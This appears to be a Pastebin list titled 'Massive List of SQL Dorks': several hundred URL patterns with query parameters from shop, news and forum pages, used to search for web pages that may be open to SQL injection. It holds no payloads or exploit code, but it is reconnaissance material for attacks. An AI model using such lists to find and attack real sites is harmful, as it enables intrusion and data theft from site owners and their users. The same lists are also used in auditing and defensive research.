prodView.php?idProduct= promo.php?id= promotion.php?catid= pview.php?Item= resellers.php?idCategory= results.php?cat= savecart.php?CartId= search.php?CartID= searchcat.php?search_id= Select_Item.php?id= Services.php?ID= shippinginfo.php?CartId= shop.php?a= shop.php?action= shop.php?bookid= shop.php?cartID= shop_details.php?prodid= shopaddtocart.php shopaddtocart.php?catalogid= shopbasket.php?bookid= shopbycategory.php?catid= shopcart.php?title= shopcreatorder.php shopcurrency.php?cid= shopdc.php?bookid= shopdisplaycategories.php shopdisplayproduct.php?catalogid= shopdisplayproducts.php shopexd.php shopexd.php?catalogid= shopping_basket.php?cartID= shopprojectlogin.php shopquery.php?catalogid= shopremoveitem.php?cartid= shopreviewadd.php?id= shopreviewlist.php?id= ShopSearch.php?CategoryID= shoptellafriend.php?id= shopthanks.php shopwelcome.php?title= show_item.php?id= show_item_details.php?item_id= showbook.php?bookid= showStore.php?catID= shprodde.php?SKU= specials.php?id= store.php?id= store_bycat.php?id= store_listing.php?id= Store_ViewProducts.php?Cat= store-details.php?id= storefront.php?id= storefronts.php?title= storeitem.php?item= StoreRedirect.php?ID= subcategories.php?id= tek9.php? template.php?Action=Item&pid= topic.php?ID= tuangou.php?bookid= type.php?iType= updatebasket.php?bookid= updates.php?ID= view.php?cid= view_cart.php?title= view_detail.php?ID= viewcart.php?CartId= viewCart.php?userID= viewCat_h.php?idCategory= viewevent.php?EventID= viewitem.php?recor= viewPrd.php?idcategory= ViewProduct.php?misc= voteList.php?item_ID= whatsnew.php?idCategory= WsAncillary.php?ID= WsPages.php?ID=noticiasDetalle.php?xid= sitio/item.php?idcd= index.php?site= de/content.php?page_id= gallerysort.php?iid= products.php?type= event.php?id= showfeature.php?id= home.php?ID= tas/event.php?id= profile.php?id= details.php?id= past-event.php?id= index.php?action= site/products.php?prodid= page.php?pId= resources/vulnerabilities_list.php?id= site.php?id= products/index.php?rangeid= global_projects.php?cid= publications/view.php?id= display_page.php?id= pages.php?ID= lmsrecords_cd.php?cdid= product.php?prd= cat/?catid= products/product-list.php?id= debate-detail.php?id= cbmer/congres/page.php?LAN= content.php?id= news.php?ID= photogallery.php?id= index.php?id= product/product.php?product_no= nyheder.htm?show= book.php?ID= print.php?id= detail.php?id= book.php?id= content.php?PID= more_detail.php?id= content.php?id= view_items.php?id= view_author.php?id= main.php?id= english/fonction/print.php?id= magazines/adult_magazine_single_page.php?magid= product_details.php?prodid= magazines/adult_magazine_full_year.php?magid= products/card.php?prodID= catalog/product.php?cat_id= e_board/modifyform.html?code= community/calendar-event-fr.php?id= products.php?p= news.php?id= view/7/9628/1.html?reply= product_details.php?prodid= catalog/product.php?pid= rating.php?id= ?page= catalog/main.php?cat_id= index.php?page= detail.php?prodid= products/product.php?pid= news.php?id= book_detail.php?BookID= catalog/main.php?cat_id= catalog/main.php?cat_id= default.php?cPath= catalog/main.php?cat_id= catalog/main.php?cat_id= category.php?catid= categories.php?cat= categories.php?cat= detail.php?prodID= detail.php?id= category.php?id= hm/inside.php?id= index.php?area_id= gallery.php?id= products.php?cat= products.php?cat= media/pr.php?id= books/book.php?proj_nr= products/card.php?prodID= general.php?id= news.php?t= usb/devices/showdev.php?id= content/detail.php?id= templet.php?acticle_id= news/news/title_show.php?id= product.php?id= index.php?url= cryolab/content.php?cid= ls.php?id= s.php?w= abroad/page.php?cid= bayer/dtnews.php?id= news/temp.php?id= index.php?url= book/bookcover.php?bookid= index.php/en/component/pvm/?view= product/list.php?pid= cats.php?cat= software_categories.php?cat_id= print.php?sid= docDetail.aspx?chnum= index.php?section= index.php?page= index.php?page= en/publications.php?id= events/detail.php?ID= forum/profile.php?id= media/pr.php?id= content.php?ID= cloudbank/detail.php?ID= pages.php?id= news.php?id= beitrag_D.php?id= content/index.php?id= index.php?i= ?action= index.php?page= beitrag_F.php?id= index.php?pageid= page.php?modul= detail.php?id= index.php?w= index.php?modus= news.php?id= news.php?id= aktuelles/meldungen-detail.php?id= item.php?id= obio/detail.php?id= page/de/produkte/produkte.php?prodID= packages_display.php?ref= shop/index.php?cPath= modules.php?bookid= product-range.php?rangeID= en/news/fullnews.php?newsid= deal_coupon.php?cat_id= show.php?id= blog/index.php?idBlog= redaktion/whiteteeth/detail.php?nr= HistoryStore/pages/item.php?itemID= aktuelles/veranstaltungen/detail.php?id= tecdaten/showdetail.php?prodid= ?id= rating/stat.php?id= content.php?id= viewapp.php?id= item.php?id= news/newsitem.php?newsID= FernandFaerie/index.php?c= show.php?id= ?cat= categories.php?cat= category.php?c= product_info.php?id= prod.php?cat= store/product.php?productid= browsepr.php?pr= product-list.php?cid= products.php?cat_id= product.php?ItemID= category.php?c= main.php?id= article.php?id= showproduct.php?productId= view_item.php?item= skunkworks/content.php?id= index.php?id= item_show.php?id= publications.php?Id= index.php?t= view_items.php?id= portafolio/portafolio.php?id= YZboard/view.php?id= index_en.php?ref= index_en.php?ref= category.php?id_category= main.php?id= main.php?id= calendar/event.php?id= default.php?cPath= pages/print.php?id= index.php?pg_t= _news/news.php?id= forum/showProfile.php?id= fr/commande-liste-categorie.php?panier= downloads/shambler.php?id= sinformer/n/imprimer.php?id= More_Details.php?id= directory/contenu.php?id_cat= properties.php?id_cat= forum/showProfile.php?id= downloads/category.php?c= index.php?cat= product_info.php?products_id= product_info.php?products_id= product-list.php?category_id= detail.php?siteid= projects/event.php?id= view_items.php?id= more_details.php?id= melbourne_details.php?id= more_details.php?id= detail.php?id= more_details.php?id= home.php?cat= idlechat/message.php?id= detail.php?id= print.php?sid= more_details.php?id= default.php?cPath= events/event.php?id= brand.php?id= toynbeestudios/content.php?id= show-book.php?id= more_details.php?id= store/default.php?cPath= property.php?id= product_details.php?id= more_details.php?id= view-event.php?id= content.php?id= book.php?id= page/venue.php?id= print.php?sid= colourpointeducational/more_details.php?id= print.php?sid= browse/book.php?journalID= section.php?section= bookDetails.php?id= profiles/profile.php?profileid= event.php?id= gallery.php?id= category.php?CID= corporate/newsreleases_more.php?id= print.php?id= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/message.php?id= podcast/item.php?pid= products.php?act= details.php?prodId= socsci/events/full_details.php?id= ourblog.php?categoryid= mall/more.php?ProdID= archive/get.php?message_id= review/review_form.php?item_id= english/publicproducts.php?groupid= news_and_notices.php?news_id= rounds-detail.php?id= gig.php?id= board/view.php?no= index.php?modus= news_item.php?id= rss.php?cat= products/product.php?id= details.php?ProdID= els_/product/product.php?id= store/description.php?iddesc= socsci/news_items/full_story.php?id= modules/forum/index.php?topic_id= feature.php?id= products/Blitzball.htm?id= profile_print.php?id= questions.php?questionid= html/scoutnew.php?prodid= main/index.php?action= ********.php?cid= ********.php?cid= news.php?type= index.php?page= viewthread.php?tid= summary.php?PID= news/latest_news.php?cat_id= index.php?cPath= category.php?CID= index.php?pid= more_details.php?id= specials.php?osCsid= search/display.php?BookID= articles.php?id= print.php?sid= page.php?id= more_details.php?id= newsite/pdf_show.php?id= shop/category.php?cat_id= shopcafe-shop-product.php?bookId= shop/books_detail.php?bookID= index.php?cPath= more_details.php?id= news.php?id= more_details.php?id= shop/books_detail.php?bookID= more_details.php?id= blog.php?blog= index.php?pid= prodotti.php?id_cat= category.php?CID= more_details.php?id= poem_list.php?bookID= more_details.php?id= content.php?categoryId= authorDetails.php?bookID= press_release.php?id= item_list.php?cat_id= colourpointeducational/more_details.php?id= index.php?pid= download.php?id= shop/category.php?cat_id= i-know/content.php?page= store/index.php?cat_id= yacht_search/yacht_view.php?pid= pharmaxim/category.php?cid= print.php?sid= specials.php?osCsid= store.php?cat_id= category.php?cid= displayrange.php?rangeid= product.php?id= csc/news-details.php?cat= products-display-details.php?prodid= stockists_list.php?area_id= news/newsitem.php?newsID= index.php?pid= newsitem.php?newsid= category.php?id= news/newsitem.php?newsID= details.php?prodId= publications/publication.php?id= purelydiamond/products/category.php?cat= category.php?cid= product/detail.php?id= news/newsitem.php?newsID= details.php?prodID= item.php?item_id= edition.php?area_id= page.php?area_id= view_newsletter.php?id= library.php?cat= categories.php?cat= page.php?area_id= categories.php?cat= publications.php?id= item.php?sub_id= page.php?area_id= page.php?area_id= category.php?catid= content.php?cID= newsitem.php?newsid= frontend/category.php?id_category= news/newsitem.php?newsID= things-to-do/detail.php?id= page.php?area_id= page.php?area_id= listing.php?cat= item.php?iid= customer/home.php?cat= staff/publications.php?sn= news/newsitem.php?newsID= library.php?cat= main/index.php?uid= library.php?cat= shop/eventshop/product_detail.php?itemid= news/newsitem.php?newsID= news/newsitem.php?newsID= library.php?cat= FullStory.php?Id= publications.php?ID= publications/book_reviews/full_review.php?id= newsitem.php?newsID= newsItem.php?newsId= site/en/list_service.php?cat= page.php?area_id= product.php?ProductID= releases_headlines_details.php?id= product.php?shopprodid= product.php?productid= product.php?product= product.php?product_id= productlist.php?id= product.php?shopprodid= garden_equipment/pest-weed-control/product.php?pr= product.php?shopprodid= browsepr.php?pr= productlist.php?id= kshop/product.php?productid= product.php?pid= showproduct.php?prodid= product.php?productid= productlist.php?id= index.php?pageId= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= wiki/pmwiki.php?page****= summary.php?PID= productlist.php?grpid= cart/product.php?productid= db/CART/product_details.php?product_id= ProductList.php?id= products/product.php?id= product.php?shopprodid= product_info.php?products_id= product_ranges_view.php?ID= cei/cedb/projdetail.php?projID= products.php?DepartmentID= product.php?shopprodid= product.php?shopprodid= product_info.php?products_id= index.php?news= education/content.php?page= Interior/productlist.php?id= products.php?categoryID= modules.php?****= message/comment_threads.php?postID= artist_art.php?id= products.php?cat= index.php?option= ov_tv.php?item= index.php?lang= showproduct.php?cat= index.php?lang= product.php?bid= product.php?bid= cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId= item_show.php?lid= ?pagerequested= downloads.php?id= print.php?sid= print.php?sid= product.php?intProductID= productList.php?id= product.php?intProductID= more_details.php?id= more_details.php?id= books.php?id= index.php?offs= mboard/replies.php?parent_id= Computer Science.php?id= news.php?id= pdf_post.php?ID= reviews.php?id= art.php?id= prod.php?cat= event_info.php?p= view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= naboard/memo.php?bd= bookmark/mybook/bookmark.php?bookPageNo= board/board.html?table= kboard/kboard.php?board= order.asp?lotid= english/board/view****.php?code= goboard/front/board_view.php?code= bbs/bbsView.php?id= boardView.php?bbs= eng/rgboard/view.php?&bbs_id= product/product.php?cate= content.php?p= page.php?module= ?pid= bookpage.php?id= view_items.php?id= index.php?pagina= product.php?prodid= notify/notify_form.php?topic_id= php/index.php?id= content.php?cid= product.php?product_id= constructies/product.php?id= detail.php?id= php/index.php?id= index.php?section= product.php?****= show_bug.cgi?id= detail.php?id= bookpage.php?id= product.php?id= today.php?eventid= main.php?item= index.php?cPath= news.php?id= event.php?id= print.php?sid= news/news.php?id= module/range/dutch_windmill_collection.php?rangeId= print.php?sid= show_bug.cgi?id= product_details.php?product_id= products.php?groupid= projdetails.php?id= product.php?productid= products.php?catid= product.php?product_id= product.php?prodid= product.php?prodid= newsitem.php?newsID= newsitem.php?newsid= profile.php?id= ********s_in_area.php?area_id= productlist.php?id= productsview.php?proid= rss.php?cat= pub/pds/pds_view.php?start= products.php?rub= ogloszenia/rss.php?cat= print.php?sid= product.php?id= print.php?sid= magazin.php?cid= galerie.php?cid= www/index.php?page= view.php?id= content.php?id= board/read.php?tid= product.php?id_h= news.php?id= index.php?book= products.php?act= reply.php?id= stat.php?id= products.php?cat_id= free_board/board_view.html?page= item.php?id= view_items.php?id= main.php?prodID= gb/comment.php?gb_id= gb/comment.php?gb_id= classifieds/showproduct.php?product= view.php?pageNum_rscomp= cart/addToCart.php?cid= content/pages/index.php?id_cat= content.php?id= display.php?ID= display.php?ID= ponuky/item_show.php?ID= default.php?cPath= main/magpreview.php?id= ***zine/board.php?board= content.php?arti_id= mall/more.php?ProdID= product.php?cat= news.php?id= content/view.php?id= content.php?id= index.php?action= board_view.php?s_board_id= KM/BOARD/readboard.php?id= board_view.html?id= content.php?cont_title= category.php?catid= mall/more.php?ProdID= publications.php?id= irbeautina/product_detail.php?product_id= print.php?sid= index_en.php?id= bid/topic.php?TopicID= news_content.php?CategoryID= front/bin/forumview.phtml?bbcode= cat.php?cat_id= stat.php?id= veranstaltungen/detail.php?id= more_details.php?id= english/print.php?id= print.php?id= view_item.php?id= content/conference_register.php?ID= rss/event.php?id= event.php?id= main.php?id= rtfe.php?siteid= category.php?cid= classifieds/detail.php?siteid= tools/print.php?id= channel/channel-layout.php?objId= content.php?id= resources/detail.php?id= more_details.php?id= detail.php?id= view_items.php?id= content/programme.php?ID= book.php?id= php/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s = detail.php?id= default.php?cPath= more_details.php?id= php/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s = content.php?id= view_items.php?id= default.php?cPath= book.php?id= view_items.php?id= products/parts/detail.php?id= category.php?cid= book.html?isbn= view_item.php?id= picgallery/category.php?cid= detail.php?id= print.php?sid= displayArticleB.php?id= knowledge_base/detail.php?id= bpac/calendar/event.php?id= mb_showtopic.php?topic_id= pages.php?id= content.php?id= exhibition_overview.php?id= singer/detail.php?siteid= Category.php?cid= detail.php?id= print.php?sid= category.php?cid= more_detail.php?X_EID= book.php?ISBN= view_items.php?id= category.php?cid= htmlpage.php?id= story.php?id= tools/print.php?id= print.php?sid= php/event.php?id= print.php?sid= articlecategory.php?id= print.php?sid= ibp.php?ISBN= club.php?cid= view_items.php?id= aboutchiangmai/details.php?id= view_items.php?id= book.php?isbn= blog_detail.php?id= event.php?id= default.php?cPath= product_info.php?products_id= shop_display_products.php?cat_id= print.php?sid= modules/content/index.php?id= printcards.php?ID= events/event.php?ID= more_details.php?id= default.php?TID= general.php?id= detail.php?id= event.php?id= referral/detail.php?siteid= view_items.php?id= event.php?id= view_items.php?id= category.php?id= cemetery.php?id= index.php?cid= content.php?id= exhibitions/detail.php?id= bookview.php?id= edatabase/home.php?cat= view_items.php?id= store/view_items.php?id= print.php?sid= events/event_detail.php?id= view_items.php?id= detail.php?id= pages/video.php?id= about_us.php?id= recipe/category.php?cid= view_item.php?id= en/main.php?id= print.php?sid= More_Details.php?id= category.php?cid= home.php?cat= article.php?id= page.php?id= print-story.php?id= psychology/people/detail.php?id= print.php?sid= print.php?ID= article_preview.php?id= Pages/whichArticle.php?id= view_items.php?id= Sales/view_item.php?id= book.php?isbn= knowledge_base/detail.php?id= gallery/gallery.php?id= event.php?id= detail.php?id= store/home.php?cat= view_items.php?id= detail.php?ID= event_details.php?id= detailedbook.php?isbn= fatcat/home.php?view= events/index.php?id= static.php?id= answer/default.php?pollID= news/detail.php?id= view_items.php?id= events/unique_event.php?ID= gallery/detail.php?ID= print.php?sid= view_items.php?id= board/showthread.php?t= book.php?id= event.php?id= more_detail.php?id= knowledge_base/detail.php?id= html/print.php?sid= index.php?id= content.php?ID= Shop/home.php?cat= store/home.php?cat= print.php?sid= gallery.php?id= resources/index.php?cat= events/event.php?id= view_items.php?id= default.php?cPath= content.php?id= products/products.php?p= auction/item.php?id= products.php?cat= clan_page.php?cid= product.php?sku= item.php?id= events?id= comments.php?id= products/?catID= modules.php?****= fshstatistic/index.php?PID= products/products.php?p= sport.php?revista= products.php?p= products.php?openparent= home.php?cat= news/shownewsarticle.php?articleid= discussions/10/9/?CategoryID= trailer.php?id= news.php?id= ?page= index.php?page= item/detail.php?num= features/view.php?id= site/?details&prodid= product_info.php?products_id= remixer.php?id= proddetails_print.php?prodid= pylones/item.php?item= index.php?cont= product.php?ItemId= video.php?id= detail.php?item_id= filemanager.php?delete= news/newsletter.php?id= shop/home.php?cat= designcenter/item.php?id= board/kboard.php?board= index.php?id= board/view_temp.php?table= magazine-details.php?magid= thread.php/id= index.php?y= products.php?sub= products.html?file= xcart/home.php?cat= event.php?contentID= forum/showthread.php?p= model.php?item= product_details.php?prodid= kboard/kboard.php?board= english/index.php?id= products.php?req= search.php?q= products.php?openparent= product.php?id= content.php?op= event_listings_short.php?s= stat.php?id= print.php?id= tutorial.php?articleid= product.php?product= content/view.php?id= phorum/read.php?3,716,721,quote= php/fidEAD6DDC6CC9D1ADDFD7876B7715A3342E18A865C.aspx?s = suffering/newssummpopup.php?newscode= kr/product/product.php?gubun= content.php?nID= search***.php?ki= nightlife/martini.php?cid= detail.php?id= discussions/9/6/?CategoryID= seWork.aspx?WORKID= modules.php?****= products.php?cat= products.php?p= cheats/item.php?itemid= index.php?main= modules/xfmod/forum/forum.php?thread_id= downloads.php?type= club.php?cid= content.php?id= forums/search.php?do= mlx/slip_about_sharebacks.php?item= category.php?categoryid= nasar/news.php?id= news.php?id= show.php?item= rmcs/opencomic.phtml?rowid= products.php?cid= index.php?url= showmedia.php?id= lit_work.php?w_id= site_list.php?sort= home.php?cat= joblog/index.php?mode= eng/board/view.php?id= item.php?id= index.php?m= detail.php?id= goods_detail.php?goodsIdx= index.php?str= episode.php?id= link.php?type= resources/detail.php?id= display-product.php?Product= main/viewItem.php?itemid= item.php?iid= index.php?list= products.php?p= subcat.php?catID= htm/item_cat.php?item_id= addcolumn.php?id= cats.php?cat= cats.php?cat= ?page= modules/content/index.php?id= detail.php?cat_id= site/?details&prodid= product.php?lang= modules/wfdownloads/singlefile.php?cid= details.php?prodid= myResources_noBanner.php?categoryID= product.php?id= ppads/external.php?type= store/product.php?productid= detail.php?id= prod_details.php?products_id= board/templete/sycho/input.php?table= cats.php?cat= product/product.php?product_no= search.php?q= record_profile.php?id= index.php?y= view.php?v_id= awards/index.php?input1= jobsite_storage_equipment/view_products.php?p_id= rural/rss.php?cat= calendar.php?event_id= eshop.php?id= content.php?ID= addimage.php?cid= category.php?cid= artist_info.php?artistId= forum/viewtopic.php?TopicID= browse.php?cid= editProduct.php?cid= main/index.php?uid= tutorials/view.php?id= products.php?p= index.php?size= pylones/item.php?item= categories.php?start= portfolio.html?categoryid= forums/showthread.php?t= item.php?code= products.php?cat= TopResources.php?CategoryID= opinion.php?option= modify_en.htm?mode= events/detail.php?id= cart/prod_details.php?prodid= html/home/products/product.php?pid= product.php?product_no= auction/item.php?id= cms/showpage.php?cid= touchy/home.php?cat= products.php?sku= fcms/view.php?cid= newsletter/newsletter.php?letter= campkc-view-event.php?Item_ID= forums/index.php?page= products.php?session= view_event.php?eid= product.php?pcid= db/item.html?item= item.php?item_id= order-now.php?prodid= product.php?id= store_prod_details.php?ProdID= products.php?sku= news.php?item= news.php?id= cart/prod_details.php?prodid= products/products.php?p= category.php?cid= specials.php?osCsid= infusions/book_panel/books.php?bookid= special_offers/more_details.php?id= book.php?id= journal.php?id= category.php?cid= News/press_release.php?id= pages/index.php?pID= exclusive.php?pID= shop/pages.php?page= index.php?cPath= shop/index.php?cat_id= artistdetail.php?ID= products_connections_detail.php?cat_id= php/fid27BF3BCB1A648805B511298CE6D643E72B4D59AD.aspx?s = reviews/more_details.php?id= press_release.php?id= product.php?rangeid= knowledgebase/article.php?id= store/index.php?cat_id= news.php?cat_id= Products/products.php?showonly= eng/store/show_scat.php?cat_id= search/index.php?q= news/press_release.php?id= html/print.php?sid= aggregator.php?id= news/shownews.php?article= default.php?cPath= press_release.php?id= book.php?bookid= cubecart/index.php?cat_id= classified/detail.php?siteid= cart/item_show.php?itemID= theater-show.php?id= cube/index.php?cat_id= preorder.php?bookID= category.php?cid= category.php?cat_id= eventsdetail.php?pid= forum/index.php?topic= print.php?sid= article.php?id= html/products.php?id= print.php?sid= read.php?in= index.php?cat_id= top/store.php?cat_id= hearst_journalism/press_release.php?id= press_release.php?id= shop/category.php?cat_id= projectdisplay.php?pid= FREE/poll.php?pid= onlineshop/productView.php?rangeId= more_details.php?id= ********.php?pid= catalog/index.php?cPath= page.php?id= index.php?cPath= article_full.php?id= hearst_journalism/press_release.php?id= dump.php?bd_id= Category.php?cid= products.php?cat= store/products.php?cat_id= product.php?cat_id= v/showthread.php?t= melbourne_details.php?id= stdetail.php?prodID= **********/fid17013034EFB2509745A39CD861F4FEA3E716FBE5.aspx?s = print.php?sid= press_release/release_detail.php?id= shop/shop.php?id= news/v.php?id= education.php?id_cat= store/store.php?cat_id= forums/showthread.php?t= news.php?id= events/event-detail.cfm?intNewsEventsID= article.php?id= viewmedia.php?prmMID= magdetail.php?magid= cemetery.php?id= index.php?id_cat= shop/index.php?cPath= view_songs.php?cat_id= shop/products.php?p= shop/index.php?cat_id= tourism/details.php?id= catalog/index.php?cPath= ViewPodcast.php?id= profile.php?objID= item_show.php?itemID= press_releases/press_releases.php?id= print.php?sid= gallery/categoria.php?id_cat= obj/print.php?objId= print.php?sid= nuell/item_show.php?itemID= products/products.php?p= products/item_show.php?itemId= view_ratings.php?cid= press_releases.php?id= main/content.php?id= shop/index.php?cat_id= book.html?isbn= shop/products.php?cat_id= kshop/home.php?cat= section.php?section= bearstore/store.php?cat_id= page_prod.php?id_cat= default.php?cPath= news.php?category= products/product.php?pid= print.php?sid= print.php?sid= show_bug.cgi?id= news.php?articleID= search/index.php?q= bookSingle.php?bookId= weekly/story.php?story_id= index.php?cPath= catalog/index.php?cPath= more_details.php?id= press_release.php?id= store/showcat.php?cat_id= m/content/article.php?content_id= article.php?id= viewstore.php?cat_id= shop.php?id_cat= news/press-announcements/press_release.php?press_id= publication/ontarget_details.php?oid= product_details.php?prodID= print.php?sid= specials.php?osCsid= category_view.php?category_id= book_dete.php?bookID= index.php?cPath= events.php?pid= articles/index.php?id= category.php?cat_id= html/products_cat.php?cat_id= more_details.php?id= preview.php?pid= product.php?productid= Product.php?Showproduct= bbs/view.php?tbl= news.php?id= details/food.php?cid= products.php?cat= calendar/week.php?cid= print.php?id= itemlist.php?categoryID= fshstatistic/index.php?&PID= press_release/release_detail.php?id= product.php?prod_num= products.php?page= con_product.php?prodid= mp-prt.php?item= notice/notice_****.php?id= showproducts.php?cid= site/?details&prodid= downloads.php?file_id= products.php?cat_id= product.php?c= campkc-today.php?Start= index.php?page= detail.php?id= shop/product.php?id= classifieds/showproduct.php?product= product-details.php?prodID= gallery/gallery.php?id= adetail.php?id= home.php?cat= store/item.php?id= products.php?cat= detail.php?prodid= links.php?cat= detail.php?prodid= videos/view.php?id= resources/index.php?cat= dream_interpretation.php?id= category.php?category_id= html/gallery.php?id= item.php?id= category.php?ID= knowledge_base/detail.php?id= home.php?cat= gallery.php?id= category.php?c= index.php?area_id= games/play.php?id= tutorial.php?articleid= directory/showcat.php?cat= gallery/gallery.php?id= news/newsitem.php?newsID= site/public/newsitem.php?newsID= index.php?cat= newsitem.php?newsID= category.php?catid= gallery.php?id= content.php?id= resources/category.php?CatID= media.php?****= store/detail.php?prodid= display_page.php?tpl= calendar/item.php?id= item-menu.php?idSubCat= Blog/viewpost.php?id= news/newsitem.php?newsID= detail.php?prodid= printarticle.php?id= article.php?id= category.php?id= page.php?id= detail.php?prodid= links/resources/links_search_result.php?catid= news_view.php?id= item.php?id= display_page.php?elementId= photog.php?id= home.php?cat= categories.php?catid= categories.php?parent_id= index.php?product= category.php?catId= cm/public/news/news.php?newsid= content.php?page= volunteers/item.php?id= ressource.php?ID= extensions/extlist.php?cat= category.php?id= cms/publications.php?id= page.php?id= offer_info.php?id= cart/detail_prod.php?id= directory.php?cat= Shop/home.php?cat= categories.php?cat= newsitem.php?newsid= shareit/readreviews.php?cat= categories.php?cat= item.php?sub_id= index.php?area_id= category.php?catid= item.php?sub_id= index.php?area_id= now_viewing.php?id= categories.php?cat= publications/?id= carry-detail.php?prodID= tools/tools_cat.php?c= detail.php?prodid= gallery/mailmanager/subscribe.php?ID= painting.php?id= Catalog_View_Summary.php?ID= categories.php?parent_id= product-detail.php?prodid= newsitem.php?newsid= liblog/index.php?cat= cart/prod_subcat.php?id= goto.php?area_id= catalog.php?CAT= showthread.php?t= category.php?id= item.php?item= site/cat.php?setlang= item.php?id= videos/view.php?id= item.php?SKU= display_page.php?id= index.php?id= faq/category.php?id= news/newsitem.php?newsid= cat.php?cat= review.php?id= knowledgebase/article.php?id= forums/showthread.php?t= product_info.php?products_id= cart/home.php?cat= item.php?id= board/viewtopic.php?id= page.php?id= english/gallery.php?id= detail.php?prodid= detail.php?prodid= item.php?item_id= article.php?ID= categories.php?cat= media.php?****= home.php?cat= gallery/gallery.php?id= library.php?author= item.php?cat= cart/home.php?cat= vb/showthread.php?p= news-item.php?id= ads/index.php?cat= item.php?code= kids-detail.php?prodID= index.php?id= category.php?id= addsiteform.php?catid= categories.php?cat= newshop/category.php?c= news/news-item.php?id= product.php?proid= catalog/product_info.php?products_id= products.php?cat= product.php?productid= browsepr.php?pr= products.php?cat= productDetail.php?prodId= productDetail.php?prodId= product.php?products_id= product.php?productid= browsepr.php?pr= product.php?ProductID= product-details.php?prodId= product_details.php?prodid= product_info.php?products_id= product.php?id= browsepr.php?pr= products.php?cat= product_details.php?product_id= products.php?cat= product.php?proid= productlist.php?tid= products.php?cat= product_details.php?product_id= products/product.php?article= products.php?cid= forums/showthread.php?t= show_prod.php?p= new/showproduct.php?prodid= product.php?productid= prod.php?Cat= productlist.php?fid= product.php?pl= product.php?proID= product_details.php?product_id= PCMA/productDetail.php?prodId= product.php?proid= panditonline/productlist.php?id= productlist.php?id= js_product_detail.php?pid= prod.php?cat= poem.php?id= estore/products.php?cat= summary.php?PID= productdetails.php?prodId= product-details.php?prodID= en/product.php?proid= product-list.php?ID= main/product.php?productid= product.php?product= site/catalog.php?cid= resources/index.php?cat= SearchProduct/ListProduct.php?PClassify_3_SN= Products/product.php?pid= clear/store/products.php?product_category= earth/visitwcm_view.php?id= products.php?categoryID= product.php?productid= products/products.php?cat= product.php?pid= product.php?proid= home.php?cat= html/projdetail.php?id= products/index.php?cat= productDetails.php?prodId= proddetail.php?prod= product.php?productid= products.php?subgroupid= product_info.php?products_id= prod.php?cat= product_detail.php?prodid= discont_productpg.php?product_id= giftshop/product.php?proid= products.php?cat= product.php?product_id= shop/products.php?cat= product_info.php?products_id= products.php?cat= SearchProduct/ListProduct.php?PClassify_3_SN= productlist.php?id= products.php?cat= product_customed.php?pid= products.php?cat= productlist.php?id= product.php?id= materials/item_detail.php?ProductID= products/productdetails.php?prodID= product_details.php?product_id= products.php?cat= projDetail.php?id= main/product.php?productid= product_details.php?product_id= product.php?proid= ProductDetails.php?ProdID= store/product.php?productid= x/product.php?productid= product.php?productid= product.php?id= iam/tabbedWithShowcase.php?pid= reviews/index.php?cat= product.php?productid= product.php?pid= product.php?proid= mhp/my***.php?hls= xcart/product.php?productid= products.php?cat= xcart/product.php?productid= productlist.php?id= product_info.php?products_id= productlist.php?cat= prodrev.php?cat= productlist.php?id= projdetail.php?id= store/customer/product.php?productid= product.php?product_id= product.php?productid= products.php?cat= cats_disp.php?cat= product.php?product_id= productdetails.php?prodid= product_details.php?product_id= product_details.php?product_id= product.php?id= productlist.php?tid= ddoecom/product.php?proid= proddetail.php?prod= productlist.php?fid= products.php?cat= Products/Catsub.php?recordID= Products/mfr.php?mfg= site/catalog.php?pid= shop/product_details.php?ProdID= usar/productDetail.php?prodID= products/display_product.php?product_id= products.php?cat= cardIssuance/product.php?pid= product.php?proid= products.php?parent= products.php?catId= productDetail.php?prodID= productlist.php?fid= products.php?mainID= products.php?cat= product_info.php?products_id= product_detail.php?prodid= catalog/product_info.php?products_id= product_info.php?products_id= products.php?cat= product.search.php?proid= productlist.php?id= product.php?proid= product.php?pid= product_reviews.php?feature_id= product.php?product_id= product.php?productid= item.php?id= directorylisting.php?cat= historical/st Link: Massive List of SQL Dorks - Pastebin.com